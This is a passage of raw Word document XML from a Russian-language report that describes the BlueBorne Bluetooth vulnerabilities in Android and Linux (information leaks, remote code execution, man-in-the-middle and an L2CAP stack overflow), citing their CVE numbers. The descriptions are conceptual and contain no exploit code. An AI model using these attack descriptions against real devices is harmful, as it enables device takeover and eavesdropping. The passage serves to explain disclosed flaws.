          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>кибер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">-атак, таких как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ботнет</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRPr="004014A6" w:rsidRDefault="00DC0109" w:rsidP="004014A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc503991010"/>
      <w:r w:rsidRPr="00731F50">
        <w:t xml:space="preserve">4.1.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:t xml:space="preserve">Атака </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004014A6" w:rsidRPr="004014A6">
        <w:t>Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRDefault="004014A6" w:rsidP="00DC0109">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Как только злоумышленник определил, что его цель использует операционную систему </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, он может использовать четыре уязвимости, обнаруженные для этих устройств, или атаку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Man-in-The-Middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:t>Уязвимость утечк</w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="004014A6">
        <w:t xml:space="preserve"> информации (CVE-2017-0785</w:t>
      </w:r>
      <w:r w:rsidR="00C45AEF">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRPr="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Первая уязвимость в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскрывает ценную информацию, которая помогает злоумышленнику использовать одну из уязвимостей удаленного выполнения кода, описанную далее. Уязвимость обнаружена в реализации SDP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">), который позволяет устройству идентифицировать другие </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">-девайсы вокруг него. Недостаток позволяет злоумышленнику отправлять набор запросов на сервер, заставляя его раскрывать бит памяти в ответ. Эта информация впоследствии может использоваться злоумышленником для преодоления мер безопасности и захвата контроля над устройством. Это также позволяет злоумышленнику получить ключи шифрования с целевого устройства и подслушивать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-сообщения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRPr="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:t>Уязвимость удаленного выполнения кода №1 (CVE-2017-0781)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта уязвимость находится в службе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Encapsulation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (BNEP). BNEP позволяет использовать Интернет через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, превращая мобильный телефон с модемом в маршрутизатор, точку доступа в Интернет. Из-за недостатка в службе BNEP хакер может вызвать нарушение целостности информации в памяти, что позволит ему запускать код на устройстве. Из-за отсутствия надлежащей проверки авторизации запуск этой уязвимости не требует какого-либо взаимодействия с пользователем, поэтому он не узнает об атаке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRPr="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:left="851" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Уязвимость удаленного выполнения кода №2 (CVE-2017-0782)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRPr="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:r w:rsidRPr="004014A6">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Эта уязвимость похожа на предыдущую, но находится на более высоком уровне службы BNEP — профиле персональной сети (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Area</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, PAN), который отвечает за установление сетевого соединения на основе IP между двумя устройствами. При этой атаке нарушение целостности информации в памяти также может быть использовано злоумышленником для получения полного контроля над зараженным устройством.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRPr="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Man-in-The-Middle (CVE-2017-0783)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004014A6" w:rsidRDefault="004014A6" w:rsidP="004014A6">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Атаки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Man-in-The-Middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MiTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) позволяют злоумышленнику перехватывать и изменять данные, поступающие на целевое устройство или с него. Чтобы реализовать атаку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MiTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> с использованием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, злоумышленнику потребуется специальное оборудование и запрос соединения целевого устройства с открытой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">-сетью. Уязвимость существует в PAN-профиле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004014A6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-стека и позволяет злоумышленнику создавать вредоносный сетевой интерфейс на устройстве жертвы, перенастраивать IP-маршрутизацию и принудительно передавать все сообщения через вредоносный сетевой интерфейс. Атака в очередной раз не требует взаимодействия с пользователем или какой-либо аутентификации, что делает её практически незаметной.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401C88" w:rsidRPr="00401C88" w:rsidRDefault="00DC0109" w:rsidP="00401C88">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc503991011"/>
      <w:r w:rsidRPr="00731F50">
        <w:t xml:space="preserve">4.1.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00401C88" w:rsidRPr="00401C88">
        <w:t xml:space="preserve">Атака </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00401C88" w:rsidRPr="00401C88">
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00401C88" w:rsidRPr="00401C88">
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00401C88" w:rsidRPr="00401C88">
        <w:t>Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00401C88" w:rsidRDefault="00401C88" w:rsidP="00401C88">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Armis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскрыла две уязвимости в операционной системе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, которые позволяют злоумышленникам полностью контролировать зараженные устройства. Первая из них — утечка информации, которая может помочь злоумышленнику определить точную версию, используемую целевым устройством, и соответствующим образом настроить его эксплойт. Вторая — переполнение стека, которое может привести к полному контролю над устройством.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401C88" w:rsidRPr="00401C88" w:rsidRDefault="00401C88" w:rsidP="00401C88">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="00401C88">
        <w:lastRenderedPageBreak/>
        <w:t>Утечка информации (CVE-2017-1000250)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401C88" w:rsidRDefault="00401C88" w:rsidP="00401C88">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Подобно уязвимости утечки информации в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, эта уязвимость находится на сервере SDP, который отвечает за одну из важнейших особенностей </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> — автоматическое подключение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">-устройств к службам, предоставляемым другими устройствами. Недостаток в SDP позволяет злоумышленнику отправлять набор запросов на сервер, заставляя его раскрывать бит памяти в ответ. Это может использоваться злоумышленником для получения конфиденциальных данных из процедур </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, которые могут содержать ключи шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401C88" w:rsidRPr="00DC0109" w:rsidRDefault="00401C88" w:rsidP="00DC0109">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Переполнение стека в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>BlueZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2017-1000251)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00490D1B" w:rsidRDefault="00401C88" w:rsidP="00490D1B">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта уязвимость была обнаружена в стеке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-ядра. Внутренний дефект в L2CAP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Logical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>control</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>adaptation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00401C88">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>), который используется для соединения между двумя устройствами, вызывает повреждение памяти, позволяющее выполнить код атакующего.</w:t>
      </w:r>
      <w:r w:rsidR="009F7D7F" w:rsidRPr="009F7D7F">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[40]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00490D1B" w:rsidRDefault="00490D1B" w:rsidP="00B335BA">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">В ядре </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux</w:t>
